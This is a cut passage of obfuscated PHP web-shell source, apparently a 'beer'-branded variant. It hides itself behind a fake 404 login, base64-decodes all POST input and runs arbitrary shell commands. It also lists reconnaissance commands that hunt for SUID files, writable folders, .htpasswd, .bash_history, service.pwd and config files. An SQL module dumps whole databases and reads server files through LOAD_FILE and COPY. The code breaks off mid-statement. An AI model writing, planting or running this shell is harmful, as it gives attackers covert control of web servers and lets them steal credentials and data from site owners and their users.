"\x3e\x20\x73\x65\156\x64\x20\165\163\x69\156\147\x20\101\112\x41\x58\x20\74\151\x6e\160\x75\x74\x20\x74\x79\160\x65\x3d\x63\x68\145\143\x6b\142\x6f\x78\x20\x6e\x61\x6d\x65\x3d\x73\150\x6f\167\x5f\x65\x72\x72\x6f\x72\x73\40\166\141\154\165\145\x3d\x31\x20" . (!empty($_POST["\167\141\164"]) || $_COOKIE[md5($_SERVER["\x48\124\124\120\x5f\x48\117\123\x54"]) . "\163\164\144\145\x72\162\137\x74\x6f\x5f\157\165\x74"] ? "\143\150\x65\x63\153\x65\x64" : '') . "\76\40\x72\145\144\x69\x72\145\x63\164\40\163\x74\x64\145\162\162\x20\164\x6f\40\163\x74\144\157\165\164\40\x28\x32\76\46\61\51\74\x2f\x6e\x6f\x62\x72\76\x3c\142\162\x2f\76\x3c\x74\145\170\164\x61\162\x65\141\40\x63\x6c\x61\163\163\75\142\x69\x67\141\162\x65\141\40\156\x61\155\x65\75\157\165\164\160\x75\164\40\163\164\x79\x6c\x65\75\42\x62\x6f\162\x64\x65\162\x2d\x62\x6f\164\164\157\155\x3a\x30\73\x6d\x61\x72\147\x69\x6e\72\60\x3b\42\40\x72\x65\x61\x64\x6f\156\x6c\x79\76"; if (!empty($_POST["\x76\x61\164"])) { echo htmlspecialchars("\x24\x20" . $_POST["\166\141\164"] . "\xa" . beer_Ex($_POST["\x76\x61\164"])); } echo "\74\57\x74\145\170\164\141\162\145\x61\x3e\74\x74\141\x62\x6c\145\40\163\x74\171\154\145\x3d\x22\142\x6f\162\144\x65\162\x3a\61\160\170\40\163\x6f\x6c\151\144\40\x23\x64\x66\65\73\x62\x61\x63\153\147\x72\157\x75\156\144\55\143\x6f\154\x6f\162\72\43\65\65\65\73\x62\157\x72\x64\x65\162\x2d\164\157\x70\72\x30\x70\170\x3b\42\40\x63\145\154\154\x70\141\x64\144\x69\156\x67\x3d\60\40\143\x65\x6c\154\x73\x70\141\143\x69\x6e\147\75\60\x20\x77\x69\x64\x74\150\x3d\x22\x31\x30\x30\x25\42\76\x3c\164\162\x3e\x3c\x74\x64\40\167\x69\x64\x74\150\75\42\x31\x25\42\x3e\44\74\57\164\x64\x3e\74\164\x64\x3e\x3c\151\x6e\160\x75\164\x20\x74\171\x70\145\75\x74\145\170\x74\x20\156\141\x6d\145\75\x63\x6d\x64\40\x73\164\171\x6c\145\75\x22\x62\x6f\162\x64\x65\162\72\60\160\170\x3b\167\151\144\x74\150\x3a\x31\60\60\x25\73\x22\40\x6f\156\153\x65\171\144\x6f\167\x6e\x3d\x22\x6b\x70\50\x65\x76\145\x6e\x74\51\73\x22\76\74\57\164\x64\x3e\74\57\164\x72\x3e\74\57\164\141\x62\x6c\x65\76"; echo "\74\x2f\146\157\162\155\x3e\x3c\57\x64\151\x76\76\x3c\x73\x63\162\x69\160\x74\x3e\x64\x2e\x63\x66\x2e\143\155\x64\56\x66\x6f\x63\x75\163\50\51\x3b\74\x2f\163\143\x72\x69\x70\x74\76"; beer_Footer(); } goto l3t5R; q0oxq: foreach ($_POST as $pk => $pv) { $_POST[$pk] = base64_decode($pv); } goto x5wc6; Rj5px: if ($os == "\x77\151\156") { $aliases = array("\x4c\x69\163\164\x44\x69\162\x65\x63\164\x6f\162\x79" => "\x64\x69\x72", "\x46\151\156\x64\151\x6e\x64\x65\170\x20\56\x20\160\x68\x70\x69\x6e\143\165\162\x72\145\156\x74\x64\151\x72" => "\144\151\162\x20\57\40\x73\40\57\40\167\x20\x2f\x20\142\151\x6e\x64\x65\x78\40\x2e\40\160\x68\x70", "\106\151\x6e\144\x20\52\40\143\157\x6e\146\x69\147\40\52\x20\56\40\160\x68\160\151\x6e\x63\x75\162\162\x65\156\164\144\x69\162" => "\144\x69\x72\x20\57\x20\x73\40\x2f\x20\x77\40\x2f\40\142\40\x2a\x20\143\x6f\x6e\146\151\147\x20\52\x20\x2e\40\x70\150\x70", "\x53\150\157\167\141\x63\x74\x69\166\x65\x63\157\156\156\145\143\x74\x69\x6f\x6e\x73" => "\x6e\x65\164\x73\x74\x61\164\40\x2d\x20\x61\x6e", "\123\x68\x6f\167\162\165\156\x6e\x69\156\x67\x73\x65\x72\x76\151\143\145\x73" => "\x6e\x65\x74\163\164\141\x72\x74", "\125\163\145\x72\x61\x63\143\157\x75\x6e\x74\x73" => "\156\x65\x74\x75\163\x65\162", "\123\150\x6f\x77\143\x6f\x6d\160\165\164\x65\162\163" => "\x6e\145\164\166\x69\145\x77", "\x41\122\120\124\x61\142\154\145" => "\141\x72\160\40\x2d\40\141", "\111\x50\x43\157\156\146\151\147\165\x72\141\x74\151\157\156" => "\151\160\143\x6f\156\146\x69\x67\x20\x2f\x20\x61\x6c\154"); } else { $aliases = array("\114\x69\x73\164\x64\151\162" => "\154\163\x20\55\x20\x6c\x68\141", "\154\x69\163\164\x66\x69\154\145\x61\x74\164\162\151\142\165\164\x65\x73\157\x6e\x61\x4c\151\156\x75\x78\x73\x65\143\x6f\x6e\x64\145\x78\x74\145\x6e\x64\x65\144\x66\x69\154\145\x73\171\x73\x74\x65\155" => "\154\163\141\164\164\x72\40\55\40\x76\x61", "\163\150\157\x77\x6f\x70\x65\x6e\145\x64\x70\x6f\162\164\163" => "\156\x65\164\x73\x74\141\164\40\x2d\40\x61\x6e\x20\x7c\40\x67\x72\145\x70\x20\55\x20\151\x6c\x69\x73\x74\145\x6e", "\x70\x72\157\143\145\163\x73\x73\164\x61\164\165\163" => "\160\163\141\x75\170", "\106\151\x6e\x64" => '', "\146\x69\x6e\x64\141\x6c\x6c\163\165\x69\x64\146\151\x6c\145\x73" => "\x66\151\156\x64\40\x2f\x20\55\164\171\160\145\146\x20\55\40\x70\x65\162\x6d\x20\55\40\60\x34\60\60\x30\40\55\40\154\x73", "\146\151\156\x64\x73\x75\x69\x64\x66\x69\x6c\145\163\151\156\143\x75\162\162\x65\x6e\164\144\151\162" => "\x66\x69\x6e\x64\x20\56\40\55\164\x79\x70\145\146\x20\55\40\160\145\162\155\x20\x2d\x20\x30\64\x30\x30\60\x20\55\40\x6c\x73", "\x66\x69\156\144\141\x6c\x6c\x73\x67\151\x64\146\x69\154\x65\x73" => "\x66\x69\156\144\x20\x2f\40\x2d\164\x79\x70\x65\x66\x20\55\40\x70\145\x72\155\40\55\40\x30\x32\60\60\60\40\55\x20\154\163", "\146\151\x6e\144\163\x67\151\x64\x66\151\154\145\x73\151\x6e\x63\165\x72\162\145\x6e\x74\x64\x69\162" => "\146\x69\x6e\144\40\x2e\x20\55\x74\x79\x70\x65\x66\x20\55\40\160\x65\x72\x6d\40\55\40\60\x32\60\x30\x30\40\55\40\154\163", "\x66\x69\x6e\144\143\x6f\x6e\146\x69\147\40\x2e\40\x69\x6e\x63\x20\56\x20\160\x68\160\146\x69\154\145\x73" => "\146\x69\156\144\x20\x2f\40\55\x74\171\x70\145\146\40\x2d\40\x6e\141\x6d\145\x63\x6f\156\x66\x69\x67\40\x2e\40\x69\156\143\x20\x2e\40\160\150\x70", "\x66\151\156\144\143\157\x6e\146\x69\x67\x20\x2a\x20\146\151\x6c\145\x73" => "\x66\151\x6e\144\x20\57\x20\55\x74\171\x70\x65\x66\40\x2d\40\x6e\x61\155\x65\42\x63\x6f\x6e\x66\151\x67\x2a\x22", "\x66\x69\156\x64\40\143\157\x6e\x66\x69\x67\x2a\40\146\151\154\145\163\x20\x69\x6e\40\x63\x75\162\x72\x65\x6e\x74\40\144\x69\x72" => "\146\x69\156\x64\40\x2e\40\55\x74\x79\x70\145\40\146\40\x2d\x6e\141\155\x65\40\x22\143\x6f\x6e\x66\151\147\x2a\42", "\146\151\156\144\40\141\x6c\154\x20\167\x72\151\164\141\142\154\145\x20\146\x6f\x6c\144\x65\162\163\40\141\x6e\144\x20\146\151\154\145\163" => "\146\151\x6e\144\x20\57\40\55\x70\x65\x72\155\x20\x2d\62\40\55\154\163", "\146\151\x6e\x64\40\x61\154\154\x20\167\162\x69\164\x61\142\x6c\x65\x20\146\x6f\154\x64\x65\162\163\40\x61\x6e\144\x20\146\x69\x6c\x65\x73\x20\x69\x6e\x20\x63\x75\x72\162\x65\x6e\x74\40\x64\151\x72" => "\x66\151\156\x64\x20\56\40\55\x70\145\x72\x6d\40\x2d\62\x20\x2d\154\x73", "\x66\x69\x6e\x64\x20\141\154\x6c\x20\x73\x65\x72\166\x69\x63\x65\56\160\167\x64\x20\x66\151\x6c\145\163" => "\x66\x69\x6e\144\x20\x2f\40\55\164\x79\160\145\x20\x66\x20\x2d\156\141\x6d\x65\40\x73\145\162\166\151\143\x65\x2e\160\x77\x64", "\x66\x69\x6e\x64\x20\163\145\x72\166\151\x63\x65\56\160\167\x64\40\146\x69\154\x65\x73\40\x69\x6e\x20\143\165\162\x72\145\x6e\164\x20\144\x69\x72" => "\x66\151\156\x64\x20\56\40\x2d\x74\x79\x70\145\x20\146\40\x2d\x6e\141\x6d\145\40\163\x65\162\166\151\x63\x65\x2e\x70\x77\144", "\146\x69\156\144\40\141\x6c\154\x20\x2e\x68\164\x70\141\x73\x73\x77\x64\x20\x66\x69\x6c\145\163" => "\x66\x69\156\144\40\57\40\x2d\164\x79\160\x65\40\146\x20\x2d\x6e\x61\x6d\x65\x20\56\150\x74\160\x61\x73\x73\x77\144", "\x66\151\156\x64\x20\56\x68\164\160\141\163\x73\x77\144\x20\x66\x69\x6c\x65\x73\x20\151\156\40\143\x75\162\x72\145\x6e\x74\x20\x64\x69\162" => "\146\x69\x6e\x64\40\56\40\55\164\x79\160\145\x20\x66\x20\55\x6e\141\155\x65\40\56\150\164\160\141\x73\163\167\144", "\146\151\x6e\144\x20\x61\154\x6c\40\56\142\141\x73\x68\137\150\151\x73\164\157\162\x79\x20\146\151\x6c\145\x73" => "\x66\x69\x6e\x64\x20\57\40\55\x74\x79\x70\x65\40\x66\x20\x2d\156\x61\x6d\x65\40\x2e\x62\141\163\150\137\x68\151\163\x74\157\162\x79", "\146\x69\156\x64\x20\x2e\142\141\x73\x68\137\150\x69\163\x74\157\162\171\40\x66\151\x6c\x65\163\x20\151\x6e\x20\143\x75\x72\162\x65\156\164\x20\x64\151\x72" => "\x66\151\156\x64\x20\56\x20\x2d\x74\x79\160\145\40\146\x20\x2d\x6e\141\x6d\x65\x20\56\142\141\x73\150\x5f\150\x69\163\164\x6f\162\x79", "\x66\151\x6e\x64\x20\x61\154\x6c\x20\x2e\x66\145\x74\x63\x68\155\x61\x69\x6c\162\x63\x20\146\x69\x6c\145\163" => "\146\151\x6e\144\x20\57\40\55\164\x79\160\145\40\146\x20\x2d\156\141\x6d\145\40\x2e\x66\x65\x74\143\x68\155\141\151\x6c\162\143", "\x66\151\x6e\x64\40\x2e\146\145\164\143\x68\x6d\x61\151\x6c\162\143\x20\146\x69\x6c\145\163\x20\x69\156\x20\x63\x75\162\x72\145\x6e\164\40\x64\x69\x72" => "\x66\x69\x6e\x64\40\56\40\x2d\x74\x79\x70\x65\40\x66\x20\55\x6e\x61\x6d\145\40\x2e\x66\x65\x74\143\x68\155\x61\x69\154\x72\143", "\114\157\x63\x61\x74\145" => '', "\154\157\143\x61\164\x65\40\150\164\164\160\x64\x2e\x63\157\156\x66\40\146\x69\x6c\x65\x73" => "\154\x6f\x63\x61\x74\x65\x20\x68\164\164\x70\144\x2e\x63\x6f\x6e\x66", "\x6c\x6f\x63\141\164\x65\x20\166\x68\x6f\x73\x74\x73\x2e\x63\157\156\x66\x20\146\151\154\x65\x73" => "\x6c\157\x63\x61\164\x65\x20\x76\x68\x6f\x73\164\163\x2e\143\x6f\156\x66", "\154\157\x63\x61\x74\145\x20\x70\162\157\146\x74\x70\144\x2e\143\x6f\156\x66\x20\x66\151\154\x65\x73" => "\154\x6f\x63\x61\x74\145\x20\160\x72\x6f\x66\164\160\144\x2e\143\x6f\x6e\x66", "\x6c\x6f\143\x61\164\145\x20\160\x73\171\x62\x6e\x63\x2e\x63\157\156\146\x20\146\151\x6c\145\163" => "\x6c\x6f\143\x61\x74\x65\40\x70\163\171\142\x6e\x63\56\x63\x6f\x6e\146", "\154\x6f\143\141\164\145\40\155\171\56\143\157\x6e\146\x20\x66\x69\x6c\145\163" => "\x6c\x6f\143\141\164\145\x20\155\x79\56\143\157\156\x66", "\154\x6f\143\141\164\145\40\x61\x64\x6d\151\156\56\x70\150\160\x20\146\x69\154\x65\x73" => "\x6c\x6f\143\x61\164\x65\40\x61\x64\x6d\x69\x6e\56\160\x68\160", "\x6c\x6f\x63\x61\164\x65\x20\x63\146\x67\x2e\x70\x68\x70\x20\x66\151\154\145\x73" => "\154\157\143\141\x74\145\40\x63\146\x67\x2e\160\150\160", "\154\157\143\141\x74\x65\40\x63\157\156\x66\x2e\x70\150\x70\x20\146\151\x6c\x65\163" => "\x6c\x6f\143\141\x74\145\40\x63\157\156\146\x2e\x70\150\x70", "\154\x6f\143\x61\164\x65\40\x63\x6f\x6e\x66\151\147\x2e\144\x61\164\x20\x66\x69\x6c\145\163" => "\154\x6f\x63\141\164\x65\x20\143\x6f\x6e\x66\x69\x67\56\144\141\x74", "\x6c\x6f\x63\x61\x74\x65\x20\x63\157\x6e\x66\x69\x67\x2e\x70\150\160\x20\146\x69\x6c\x65\x73" => "\x6c\157\x63\x61\x74\x65\40\143\x6f\156\146\x69\x67\x2e\x70\x68\x70", "\x6c\157\x63\x61\x74\145\x20\x63\x6f\156\x66\x69\147\56\x69\x6e\x63\40\x66\151\154\145\x73" => "\154\157\x63\141\164\x65\x20\x63\x6f\156\x66\x69\x67\56\x69\x6e\143", "\x6c\157\143\141\x74\145\40\x63\x6f\156\x66\151\x67\56\151\x6e\143\56\x70\x68\x70" => "\154\x6f\143\x61\164\x65\40\x63\x6f\x6e\x66\151\x67\x2e\x69\x6e\143\x2e\x70\150\160", "\154\157\x63\141\164\x65\x20\x63\157\156\x66\151\x67\56\144\145\146\x61\165\x6c\164\x2e\160\150\x70\40\x66\x69\154\145\x73" => "\154\x6f\x63\141\x74\145\x20\143\x6f\x6e\146\151\147\x2e\144\x65\x66\x61\x75\x6c\164\x2e\x70\150\160", "\x6c\157\x63\x61\x74\145\x20\x63\157\x6e\x66\x69\147\52\x20\x66\151\154\x65\163\x20" => "\154\157\x63\x61\164\x65\x20\143\x6f\156\x66\151\x67", "\154\157\x63\x61\164\x65\x20\56\143\x6f\x6e\146\40\x66\x69\154\145\x73" => "\x6c\x6f\x63\141\164\x65\x20\x27\x2e\x63\x6f\156\146\x27", "\154\x6f\x63\x61\164\145\x20\56\x70\x77\x64\x20\x66\151\x6c\145\163" => "\154\x6f\143\141\x74\145\40\47\56\160\x77\144\x27", "\x6c\157\x63\141\164\145\x20\56\x73\161\154\x20\146\x69\x6c\145\x73" => "\154\x6f\143\141\x74\x65\40\47\56\x73\161\154\47", "\154\157\x63\x61\x74\145\40\56\x68\164\x70\x61\x73\163\x77\144\40\146\x69\154\145\x73" => "\x6c\x6f\143\141\x74\145\40\47\x2e\x68\x74\x70\x61\163\x73\x77\x64\x27", "\x6c\x6f\143\141\164\145\x20\56\x62\x61\x73\150\x5f\x68\x69\x73\164\157\x72\171\40\146\x69\x6c\145\163" => "\154\157\143\141\x74\x65\40\x27\56\x62\x61\163\x68\x5f\x68\x69\x73\164\x6f\162\171\x27", "\x6c\157\143\141\164\145\x20\56\155\x79\x73\x71\x6c\x5f\150\151\163\164\x6f\x72\x79\40\x66\151\x6c\x65\163" => "\x6c\x6f\143\141\164\x65\40\47\x2e\x6d\171\x73\161\x6c\x5f\150\151\163\164\157\162\171\47", "\x6c\x6f\x63\x61\x74\145\40\56\x66\145\x74\143\x68\x6d\141\x69\x6c\x72\x63\40\x66\151\154\x65\x73" => "\x6c\157\x63\141\x74\145\40\x27\x2e\x66\x65\x74\x63\x68\155\x61\x69\154\x72\143\x27", "\154\157\143\x61\164\145\x20\x62\141\x63\x6b\x75\x70\x20\x66\151\154\x65\163" => "\154\x6f\143\141\x74\145\40\142\x61\143\153\165\160", "\154\x6f\143\x61\164\x65\40\144\165\155\x70\40\x66\151\154\x65\163" => "\x6c\x6f\143\x61\164\x65\x20\x64\x75\x6d\x70", "\x6c\x6f\143\x61\x74\145\40\x70\x72\x69\x76\40\146\151\154\x65\x73" => "\154\x6f\143\141\164\145\x20\x70\162\x69\x76"); } goto ieWhI; zJLfh: $home_cwd = @getcwd(); goto gZrfO; Nyn9W: function beer_Login() { header("\x48\x54\124\x50\x2f\x31\x2e\60\x20\64\60\x34\x20\116\157\164\40\106\x6f\165\x6e\x64"); die; } goto XRmTa; I0hyB: $default_action = "\x46\x69\154\x65\x73\x4d\141\156"; goto l8fZe; JVcoR: function beer_Perms($p) { if (($p & 49152) == 49152) { $i = "\x73\x20"; } elseif (($p & 40960) == 40960) { $i = "\154\40"; } elseif (($p & 32768) == 32768) { $i = "\55\x20"; } elseif (($p & 24576) == 24576) { $i = "\x62\x20"; } elseif (($p & 16384) == 16384) { $i = "\144\40"; } elseif (($p & 8192) == 8192) { $i = "\x63\x20"; } elseif (($p & 4096) == 4096) { $i = "\x70\40"; } else { $i = "\165\x20"; } $i .= $p & 256 ? "\x72\x20" : "\55\x20"; $i .= $p & 128 ? "\x77\40" : "\x2d\x20"; $i .= $p & 64 ? $p & 2048 ? "\163\x20" : "\x78\x20" : ($p & 2048 ? "\x53\x20" : "\x2d\40"); $i .= $p & 32 ? "\162\x20" : "\55\40"; $i .= $p & 16 ? "\167\x20" : "\x2d\40"; $i .= $p & 8 ? $p & 1024 ? "\x73\40" : "\x78\40" : ($p & 1024 ? "\123\x20" : "\x2d\x20"); $i .= $p & 4 ? "\x72\40" : "\x2d\40"; $i .= $p & 2 ? "\x77\40" : "\x2d\x20"; $i .= $p & 1 ? $p & 512 ? "\x74\x20" : "\170\40" : ($p & 512 ? "\124\x20" : "\x2d\40"); return $i; } goto crDTV; crDTV: function beer_PermsColor($f) { if (!@is_readable($f)) { return "\x3c\146\157\x6e\x74\x20\143\x6f\154\x6f\162\x3d\x23\x46\x46\60\x30\60\x30\76" . beer_Perms(@fileperms($f)) . "\74\x2f\146\x6f\x6e\164\76"; } elseif (!@is_writable($f)) { return "\74\146\x6f\x6e\164\x20\x63\157\154\157\x72\75\167\x68\x69\164\x65\76" . beer_Perms(@fileperms($f)) . "\x3c\x2f\146\x6f\156\x74\76"; } else { return "\74\x66\x6f\156\x74\x20\143\x6f\154\157\162\x3d\x23\x32\65\146\x66\60\60\x3e" . beer_Perms(@fileperms($f)) . "\74\x2f\x66\x6f\156\164\x3e"; } } goto Dzyeb; Xqmnf: if (empty($_POST["\x61\x63\164"])) { if (isset($default_action) && function_exists("\141\x63\x74\x69\157\156" . $default_action)) { $_POST["\141\x63\164"] = $default_action; } else { $_POST["\x61\x63\164"] = "\x53\145\143\x49\x6e\146\x6f"; } } goto cFBhY; KmmG0: if (!isset($_COOKIE[md5($_SERVER["\110\x54\124\120\x5f\x48\x4f\x53\x54"]) . "\141\152\141\x78"])) { $_COOKIE[md5($_SERVER["\x48\x54\x54\x50\x5f\110\117\123\x54"]) . "\x61\152\x61\170"] = (bool) $default_use_ajax; } goto Rj5px; beSCq: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "\x6d\x79\x73\x71\x6c": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "\x70\147\x73\x71\154": $host = explode("\x3a", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("\150\x6f\163\164\x3d{$host[0]}\40\160\157\162\x74\75{$host[1]}\40\x75\163\x65\162\75{$user}\x20\160\x61\163\x73\167\157\x72\144\x3d{$pass}\x20\x64\142\156\x61\155\145\x3d{$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "\155\171\163\161\154": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "\x6d\171\163\x71\154": return $this->res = @mysql_query($str); break; case "\160\147\163\x71\154": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "\x6d\171\x73\x71\x6c": return @mysql_fetch_assoc($res); break; case "\160\x67\x73\161\154": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "\x6d\x79\163\161\154": return $this->query("\123\110\117\x57\x20\x64\x61\x74\141\142\x61\163\145\x73"); break; case "\x70\147\x73\161\154": return $this->res = $this->query("\x53\105\114\x45\x43\x54\x20\x64\141\x74\156\141\x6d\x65\40\x46\122\x4f\115\x20\x70\147\x5f\144\x61\x74\141\x62\x61\x73\145\40\127\110\x45\122\105\40\x64\x61\164\151\x73\x74\x65\155\x70\x6c\x61\164\145\x21\75\x27\164\x27"); break; } return false; } function listTables() { switch ($this->type) { case "\x6d\x79\x73\161\x6c": return $this->res = $this->query("\123\x48\x4f\x57\x20\124\101\x42\114\x45\x53"); break; case "\x70\x67\x73\161\154": return $this->res = $this->query("\x73\145\x6c\x65\143\x74\x20\x74\x61\142\154\145\137\156\x61\155\145\40\146\162\x6f\x6d\x20\x69\x6e\x66\x6f\x72\x6d\141\164\151\157\156\137\x73\x63\150\145\x6d\x61\x2e\164\141\142\x6c\x65\163\40\167\x68\x65\x72\145\40\x74\x61\x62\x6c\x65\137\163\x63\150\145\x6d\141\x20\41\x3d\x20\47\151\156\x66\x6f\x72\x6d\141\164\x69\157\x6e\x5f\163\143\150\145\155\141\47\40\101\x4e\x44\40\164\141\142\x6c\145\x5f\163\x63\x68\145\155\141\40\x21\x3d\40\47\160\x67\137\x63\x61\164\x61\154\157\147\x27"); break; } return false; } function error() { switch ($this->type) { case "\155\171\x73\161\154": return @mysql_error(); break; case "\x70\147\163\161\154": return @pg_last_error(); break; } return false; } function setcset($str) { switch ($this->type) { case "\x6d\171\x73\161\154": if (function_exists("\155\x79\163\161\x6c\137\163\x65\x74\137\x63\163\145\x74")) { return @mysql_set_cset($str, $this->link); } else { $this->query("\x53\105\124\x20\x63\163\145\164\x20" . $str); } break; case "\x70\147\x73\161\x6c": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "\155\x79\x73\x71\x6c": return $this->fetch($this->query("\123\105\114\105\103\x54\40\x4c\x4f\x41\x44\137\x46\x49\114\105\x28\47" . addslashes($str) . "\x27\51\40\x61\163\40\146\x69\x6c\145")); break; case "\160\x67\163\x71\154": $this->query("\x43\x52\105\x41\124\105\x20\124\x41\102\x4c\105\40\x62\145\x65\x72\x5f\62\50\146\x69\x6c\x65\40\x74\145\170\164\51\x3b\x43\117\120\x59\40\x62\x65\145\x72\x5f\62\40\x46\x52\117\x4d\40\x27" . addslashes($str) . "\x27\73\163\145\x6c\145\143\164\40\x66\151\154\145\x20\146\162\157\x6d\x20\x62\x65\x65\x72\x5f\x32\73"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["\x66\x69\154\x65"]; } $this->query("\x64\162\157\x70\x20\164\141\142\x6c\145\40\142\x65\145\162\137\62"); return array("\x66\151\154\145" => implode("\12", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "\155\171\x73\161\x6c": $res = $this->query("\x53\110\x4f\x57\x20\x43\122\x45\101\124\105\x20\124\101\x42\114\x45\x20\140" . $table . "\x60"); $create = mysql_fetch_array($res); $sql = $create[1] . "\x3b\12"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("\123\105\114\x45\103\124\40\52\40\106\122\117\115\x20\x60" . $table . "\140"); $i = 0; $head = true; while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = "\73\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "\x4e\x55\x4c\114"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "\x27" . @mysql_real_escape_string($v) . "\x27"; } $columns[] = "\x60" . $k . "\x60"; } if ($head) { $sql .= "\111\x4e\123\x45\x52\x54\x20\x49\x4e\124\117\40\140" . $table . "\140\x20\50" . implode("\x2c\40", $columns) . "\51\x20\x56\101\114\125\x45\x53\x20\12\11\50" . implode("\x2c\x20", $item) . "\51"; $head = false; } else { $sql .= "\12\x9\54\x28" . implode("\x2c\40", $item) . "\x29"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, "\x3b\xa\xa"); } else { echo "\x3b\12\xa"; } } break; case "\160\x67\163\161\154": $this->query("\x53\105\114\x45\x43\124\x20\52\40\x46\x52\117\115\x20" . $table); while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "\47" . addslashes($v) . "\47"; $columns[] = $k; } $sql = "\111\x4e\123\x45\122\x54\40\x49\x4e\x54\x4f\40" . $table . "\x20\50" . implode("\x2c\x20", $columns) . "\x29\x20\x56\x41\114\x55\x45\123\40\50" . implode("\x2c\x20", $item) . "\x29\73" . "\12"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["\164\x79\160\145"]); if (@$_POST["\167\141\x74"] == "\144\x6f\167\x6e\154\x6f\141\x64" && @$_POST["\166\141\164"] != "\163\145\154\145\x63\164") { $db->connect($_POST["\163\x71\154\137\150\x6f\x73\164"], $_POST["\x73\x71\x6c\x5f\154\x6f\x67\151\156"], $_POST["\163\161\x6c\137\160\141\x73\163"], $_POST["\163\161\x6c\137\142\x61\x73\145"]); $db->selectdb($_POST["\x73\x71\154\137\x62\141\163\145"]); switch ($_POST["\x63\x73\x65\x74"]) { case "\x57\151\x6e\144\x6f\167\163\55\61\62\x35\x31": $db->setcset("\x63\x76\x61\164\x32\65\61"); break; case "\x55\124\x46\55\x38": $db->setcset("\165\164\x66\x38"); break; case "\113\x4f\111\x38\x2d\x52": $db->setcset("\153\157\151\x38\162"); break; case "\113\117\x49\70\55\125": $db->setcset("\x6b\x6f\x69\x38\165"); break; case "\143\160\x38\66\x36": $db->setcset("\143\160\70\66\66"); break; } if (empty($_POST["\x66\151\x6c\x65"])) { ob_start("\x6f\x62\x5f\x67\x7a\x68\x61\156\x64\154\x65\162", 4096); header("\x43\157\156\164\145\156\164\55\104\151\163\160\x6f\163\x69\164\151\157\156\x3a\40\141\164\x74\141\143\x68\x6d\x65\x6e\164\x3b\40\x66\151\x6c\145\x6e\x61\155\145\75\144\165\x6d\x70\x2e\163\161\154"); header("\103\x6f\156\x74\145\156\x74\55\124\171\160\x65\72\40\164\x65\170\164\57\x70\x6c\x61\x69\156"); foreach ($_POST["\x74\142\x6c"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["\x66\151\154\145"], "\167")) { foreach ($_POST["\x74\142\154"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["\167\x61\164"]); } else { die("\74\x73\143\x72\x69\160\164\76\141\154\145\x72\164\x28\42\x45\162\162\157\x72\41\x20\x43\141\156\x27\164\40\157\160\x65\156\40\x66\x69\x6c\145\x22\51\73\167\x69\x6e\144\x6f\x77\56\x68\151\x73\164\157\x72\171\56\142\x61\x63\x6b\x28\x2d\61\51\74\x2f\163\x63\162\x69\160\164\76"); } } beer_Header(); echo "\12\74\x68\61\x3e\123\161\x6c\40\x62\162\x6f\167\x73\x65\x72\x3c\57\150\x31\76\x3c\x64\151\166\40\x63\x6c\x61\x73\x73\75\x63\x6f\156\x74\x65\156\x74\76\xa\x3c\146\157\162\155\40\156\x61\x6d\x65\75\x27\163\x66\47\x20\x6d\x65\x74\150\x6f\x64\x3d\x27\160\157\x73\164\47\40\x6f\156\x73\165\x62\x6d\151\x74\x3d\x27\146\x73\50\x74\x68\x69\x73\51\73\47\76\x3c\164\x61\142\154\145\x20\x63\x65\x6c\x6c\160\x61\x64\144\x69\156\x67\x3d\x27\62\x27\x20\x63\x65\x6c\x6c\x73\x70\x61\x63\151\156\x67\x3d\x27\x30\x27\76\74\x74\x72\76\xa\74\164\144\76\124\171\x70\145\x3c\57\164\x64\x3e\x3c\x74\144\76\x48\157\x73\x74\74\57\x74\144\x3e\74\x74\x64\x3e\114\157\147\151\156\74\x2f\x74\144\76\74\x74\144\76\x50\x61\x73\x73\167\157\x72\x64\x3c\57\164\144\x3e\x3c\164\144\76\x44\x61\164\141\x62\141\x73\145\x3c\x2f\x74\x64\x3e\x3c\164\144\76\x3c\57\164\x64\x3e\74\57\x74\x72\76\x3c\164\162\76\xa\74\x69\x6e\160\x75\x74\40\x74\x79\160\145\x3d\150\x69\144\144\x65\156\40\x6e\x61\155\x65\75\141\x20\x76\x61\154\x75\x65\75\123\161\154\76\74\151\x6e\x70\x75\x74\40\x74\171\160\145\75\150\x69\144\144\145\x6e\x20\156\141\155\145\75\166\141\164\x20\166\x61\x6c\165\x65\75\x27\x71\165\x65\162\x79\x27\x3e\74\151\156\160\x75\164\40\x74\x79\160\x65\75\150\x69\x64\x64\x65\156\40\156\x61\x6d\145\75\x77\x61\164\x20\x76\x61\x6c\x75\145\x3d\47\47\76\74\x69\x6e\160\165\164\x20\x74\x79\160\145\75\x68\151\x64\x64\145\156\40\x6e\141\155\145\75\143\x20\166\141\154\x75\x65\x3d\47" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\x27\76\x3c\x69\156\x70\x75\164\x20\x74\171\160\145\75\150\151\144\x64\145\x6e\x20\x6e\x61\x6d\145\75\143\163\x65\x74\40\x76\x61\154\x75\x65\75\x27" . (isset($_POST["\x63\x73\x65\x74"]) ? $_POST["\143\163\x65\x74"] : '') . 